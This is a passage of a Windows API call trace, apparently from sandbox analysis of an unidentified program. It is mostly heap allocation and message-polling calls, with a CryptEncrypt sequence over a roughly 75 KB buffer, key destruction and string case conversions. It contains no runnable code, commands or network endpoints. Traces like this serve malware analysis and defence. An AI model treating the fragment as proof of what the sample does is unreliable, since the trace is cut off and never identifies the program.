lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d6fd0 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.858] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x126b3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x126b8) returned 1 [0198.858] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.858] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.858] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.858] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.858] CharLowerBuffW (in: lpsz="byte[75448]", cchLength=0xb | out: lpsz="byte[75448]") returned 0xb [0198.858] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.860] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.860] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.860] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.860] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.860] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.860] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.860] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d6fd0*, pdwDataLen=0x8bef68*=0x126b3, dwBufLen=0x126b8 | out: pbData=0x34d6fd0*, pdwDataLen=0x8bef68*=0x126b8) returned 1 [0198.861] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.862] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.862] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.863] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.863] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.863] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.863] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.863] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.863] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.863] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.863] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.863] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.863] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.863] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.863] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.863] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.863] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.863] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.863] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.863] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.863] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.864] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.868] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.869] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.869] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.870] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.870] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.870] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0198.870] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.870] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0198.870] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.870] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.871] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.871] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.871] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.871] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.871] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.871] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.871] CryptDestroyKey (hKey=0xaa5660) returned 1 [0198.871] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.871] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.871] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.871] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.871] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.871] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.871] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.871] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.871] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.872] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.872] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.872] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.872] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.872] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.872] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.872] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.872] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.873] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.873] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.873] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.873] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.873] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.873] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.873] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.873] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.873] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.873] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.873] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.873] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.874] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.874] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.874] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.874] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.874] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.874] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.874] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.874] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.874] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.875] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.875] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.875] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 